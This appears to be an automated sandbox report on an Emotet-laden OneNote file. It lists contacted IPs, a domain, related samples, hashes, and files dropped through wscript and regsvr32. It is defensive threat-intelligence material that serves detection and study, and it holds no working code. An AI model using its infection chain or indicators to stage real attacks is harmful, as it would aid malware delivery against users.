              		unknownBrazil
              		28169BITCOMPROVEDORDESERVICOSDEINTERNETLTDABRtrue
              82.223.21.224
              		unknownSpain
              		8560ONEANDONE-ASBrauerstrasse48DEtrue
              173.212.193.249
              		unknownGermany
              		51167CONTABODEtrue
              95.217.221.146
              		unknownGermany
              		24940HETZNER-ASDEtrue
              149.56.131.28
              		unknownCanada
              		16276OVHFRtrue
              182.162.143.56
              		unknownKorea Republic of
              		3786LGDACOMLGDACOMCorporationKRtrue
              1.234.2.232
              		unknownKorea Republic of
              		9318SKB-ASSKBroadbandCoLtdKRtrue
              129.232.188.93
              		unknownSouth Africa
              		37153xneeloZAtrue
              94.23.45.86
              		unknownFrance
              		16276OVHFRtrue

              General Information

              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:828495
              Start date and time:2023-03-17 09:15:06 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 9m 0s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:Insight_Medical_Publishing_3.one
              Detection:MAL
              Classification:mal100.troj.expl.evad.winONE@9/11@1/49
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 50.2% (good quality ratio 42.4%)
              • Quality average: 60.5%
              • Quality standard deviation: 35.6%
              HCA Information:
              • Successful, ratio: 89%
              • Number of executed functions: 19
              • Number of non-executed functions: 136
              Cookbook Comments:
              • Found application associated with file extension: .one

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 93.184.221.240, 95.140.230.192
              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              09:16:48API Interceptor2x Sleep call for process: wscript.exe modified
              09:17:21API Interceptor10x Sleep call for process: regsvr32.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              110.232.117.186Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                  Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                    Omics_Journal.oneGet hashmaliciousEmotetBrowse
                      OMICS.oneGet hashmaliciousEmotetBrowse
                        OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                          OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                            OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                              Opast_International.oneGet hashmaliciousEmotetBrowse
                                opastonline.com.oneGet hashmaliciousEmotetBrowse
                                  Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                    Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                      omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                        report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                          2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                            report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                              100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                  2023-03-16_1753.oneGet hashmaliciousEmotetBrowse
                                                    PUV026949243199756981_202303161748.oneGet hashmaliciousEmotetBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      penshorn.orgInsight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      OMICS.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      Opast_International.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      2023-03-16_1753.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      PUV026949243199756981_202303161748.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      RACKCORP-APRackCorpAUInsight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      OMICS.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      Opast_International.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      2023-03-16_1753.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186
                                                      PUV026949243199756981_202303161748.oneGet hashmaliciousEmotetBrowse
                                                      • 110.232.117.186

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ce5f3254611a8c095a3d821d44539877Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      OMICS.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      Opast_International.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      aRThcK3rSO.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                      • 203.26.41.131
                                                      click.wsfGet hashmaliciousEmotetBrowse
                                                      • 203.26.41.131
                                                      setup.exeGet hashmaliciousAmadey, Djvu, RedLine, SmokeLoaderBrowse
                                                      • 203.26.41.131
                                                      purchase_order.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                                      • 203.26.41.131
                                                      file.exeGet hashmaliciousAmadey, Djvu, SmokeLoaderBrowse
                                                      • 203.26.41.131
                                                      setup.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 203.26.41.131
                                                      it2NFpv2yt.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 203.26.41.131

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dllInsight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                        OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                          Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                            Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                              OMICS.oneGet hashmaliciousEmotetBrowse
                                                                OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                  OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                    OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                      Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                        opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                          Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                            Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                              omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                                report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                  2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                                                    report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                                      100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                                                        NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                                                          2023-03-16_1753.oneGet hashmaliciousEmotetBrowse
                                                                                            PUV026949243199756981_202303161748.oneGet hashmaliciousEmotetBrowse

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\regsvr32.exe
                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):62582
                                                                                              Entropy (8bit):7.996063107774368
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
                                                                                              MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
                                                                                              SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
                                                                                              SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                                                                                              SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                                                                                              Malicious:false
                                                                                              Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\regsvr32.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):290
                                                                                              Entropy (8bit):2.9542848029467006
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:kKNg1ry/CN+SkQlPlEGYRMY9z+4KlDA3RUe/:WJCpkPlE99SNxAhUe/
                                                                                              MD5:D9F329065228D1052F80DFD86FBAF630
                                                                                              SHA1:BEB453F722F5DA26BAB114412369BC790455C431
                                                                                              SHA-256:4B5C31C51235D3A2F1AFA5BCE16D41AA2DA95014B493C526637BE6E1865EF2EB
                                                                                              SHA-512:BF037A5AFFF2DB2BDA7BC204BEBAE79192DC1DF823C7496BD669ECE3395ACD01BF5C9461666A32C9F2E679665EE7068EA9049E51181FCF454A7033F34803DF55
                                                                                              Malicious:false
                                                                                              Preview:p...... .........1...X..(....................................................... ..........).K..................v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

                                                                                              C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                              File Type:Matlab v4 mat-file (little endian) \340\004, numeric, rows 262223750, columns 0
                                                                                              Category:dropped
                                                                                              Size (bytes):72
                                                                                              Entropy (8bit):2.106463217645438
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ulXH+lS8TcRaAqlAaRtl:KelS8Tc8TX
                                                                                              MD5:6D35FE979A2AF81158578D8FF8AA4390
                                                                                              SHA1:4FACFE5FFF9553E926FC82615BBFF18F47876715
                                                                                              SHA-256:41E5436CD2453FF8DC3D187CCC680CE58212D72C77CCA0E632B51085BDE7ECED
                                                                                              SHA-512:947226E35A9BEC0F93AE0467AC23DBE81EFC681A48F3FE6F49F70A2B0BDD35AB533165240D442C2492EA57D29CFA403B848FF8E9BB6EFEADAB507C12DEAE4CEE
                                                                                              Malicious:false
                                                                                              Preview:.....7..........$...................................T...................

                                                                                              C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):0.7053394102816869
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:geymLsJE+mZc8/hzSlZWV6dNg6qnuaLvOlSosUZKg9eiDx8lW:NiuPZGlZWV6da6+uazODZKDiDv
                                                                                              MD5:DD5E5ED496A7861D9B6F291070CC5F5B
                                                                                              SHA1:697CDBB2F039943BE9EB82B52D5711709BC998E1
                                                                                              SHA-256:B1D13B637698D27B702BD7797D61AD1B2A297FDF8758B5E653DF2AE3961612D8
                                                                                              SHA-512:486214A36237BAB2DC7925CDCBA1F799A3F790C0BB18FBABEEECA7C47568376E3E520DD185F7D53878C2B955B7D2CC122DAA4EA377B221BF6E5D2AD313670EF1
                                                                                              Malicious:false
                                                                                              Preview:.@..`....................................................................................t...............@.......B...........X..Zb..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................[...... .....p....X..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P.............................................................................7.B..t......17134.1.x86fre.rs4_release.180410-1804......$.@..t......U......@..%|n.z.....P:\Target\x86\ship\onenote\x-none\onmain.pdb.ain.pdb.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.............................................

                                                                                              C:\Users\user\AppData\Local\Temp\click.wsf

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\wscript.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):9
                                                                                              Entropy (8bit):2.94770277922009
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:tWn:tWn
                                                                                              MD5:07F5A0CFFD9B2616EA44FB90CCC04480
                                                                                              SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
                                                                                              SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
                                                                                              SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
                                                                                              Malicious:true
                                                                                              Preview:badum tss

                                                                                              C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\wscript.exe
                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):316928
                                                                                              Entropy (8bit):7.337848702590508
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                              MD5:BFC060937DC90B273ECCB6825145F298
                                                                                              SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                              SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                              SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 58%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: Insight_Medical_Publishing_4.one, Detection: malicious, Browse
                                                                                              • Filename: OMICS_Online_1.one, Detection: malicious, Browse
                                                                                              • Filename: Insight_Medical_Publishing.one, Detection: malicious, Browse
                                                                                              • Filename: Omics_Journal.one, Detection: malicious, Browse
                                                                                              • Filename: OMICS.one, Detection: malicious, Browse
                                                                                              • Filename: OPAST_GROUP_1.one, Detection: malicious, Browse
                                                                                              • Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse
                                                                                              • Filename: OPAST_GROUP.one, Detection: malicious, Browse
                                                                                              • Filename: Opast_International.one, Detection: malicious, Browse
                                                                                              • Filename: opastonline.com.one, Detection: malicious, Browse
                                                                                              • Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse
                                                                                              • Filename: Opast_Publishing_Group.one, Detection: malicious, Browse
                                                                                              • Filename: omicsonline.net.one, Detection: malicious, Browse
                                                                                              • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                              • Filename: 2023-03-16_0923.one, Detection: malicious, Browse
                                                                                              • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                              • Filename: 100935929722734787.one, Detection: malicious, Browse
                                                                                              • Filename: NG7553084292252526_202303161746.one, Detection: malicious, Browse
                                                                                              • Filename: 2023-03-16_1753.one, Detection: malicious, Browse
                                                                                              • Filename: PUV026949243199756981_202303161748.one, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):25280
                                                                                              Entropy (8bit):0.5433410247296293
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:PbnnYsDoODcOOErE5+9olgk8Z4GQTaza2egb:PbzoUOkI+6lAUaza2ee
                                                                                              MD5:D0642277D4B13D42E7606EF972F5AFE9
                                                                                              SHA1:ED016803728F5DDC3EA7346683C1F6D93A26F90B
                                                                                              SHA-256:BB4AC658CDF79F055414BB6981C415ABB9CA64C6CF47D1895FA1D7A8E0A3BEAE
                                                                                              SHA-512:7FB1F165197D53E3B0CAE3ABDBD19755AFB0F61CA2E602FCC1A14828248E69A607B4CCF84A1C2E1A234F69C99DDAE7823F4044B7A572E3337526BC62E6A90AE3
                                                                                              Malicious:false
                                                                                              Preview:.%c....L..=../\.......G...S.h.................?.....I.......*...*...*...*...........................................................................................h............................b...............i.....N..{..j.............S..L.b.$..+.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):3873
                                                                                              Entropy (8bit):3.514272379585467
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:N8dQdO1aMIFVbqzqgdCDDGTCDfodRdQdO1aMh7+xGqzWk7dCDGWG5CDdZ0tgH:oKiqfGaoFqLZhgO4
                                                                                              MD5:9AC073B56A8C9E131C96CEA3E1D410B2
                                                                                              SHA1:EA91260019132F020F365CDF5201C58D0ED6149E
                                                                                              SHA-256:F5CA8F18F25E2A9B8F571C4A721E53DC636AD5D4688E240104680352E31B41AE
                                                                                              SHA-512:A6615C16F9E199B00F4CF381B66BD936BFC21DE93129CD54E5D92CCACB81DEBA556D7F5E3CDE3711B93CD33CC58EC9828A8D372AE5B6D8D0FF3127C77A74115A
                                                                                              Malicious:false
                                                                                              Preview:...................................FL..................F.@.. .....Q{....,1..X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U...PROGRA~2.........L.qV......................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......P.qV.......]....................m.Q.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P*...Office16..B.......P.qV.......]......................&.O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV...............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZUNH4RPCMTORJA8SP86T.temp

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):3873
                                                                                              Entropy (8bit):3.514272379585467
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:N8dQdO1aMIFVbqzqgdCDDGTCDfodRdQdO1aMh7+xGqzWk7dCDGWG5CDdZ0tgH:oKiqfGaoFqLZhgO4
                                                                                              MD5:9AC073B56A8C9E131C96CEA3E1D410B2
                                                                                              SHA1:EA91260019132F020F365CDF5201C58D0ED6149E
                                                                                              SHA-256:F5CA8F18F25E2A9B8F571C4A721E53DC636AD5D4688E240104680352E31B41AE
                                                                                              SHA-512:A6615C16F9E199B00F4CF381B66BD936BFC21DE93129CD54E5D92CCACB81DEBA556D7F5E3CDE3711B93CD33CC58EC9828A8D372AE5B6D8D0FF3127C77A74115A
                                                                                              Malicious:false
                                                                                              Preview:...................................FL..................F.@.. .....Q{....,1..X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U...PROGRA~2.........L.qV......................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......P.qV.......]....................m.Q.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P*...Office16..B.......P.qV.......]......................&.O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV...............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                              C:\Windows\System32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll (copy)

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\regsvr32.exe
                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):316928
                                                                                              Entropy (8bit):7.337848702590508
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                              MD5:BFC060937DC90B273ECCB6825145F298
                                                                                              SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                              SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                              SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 58%
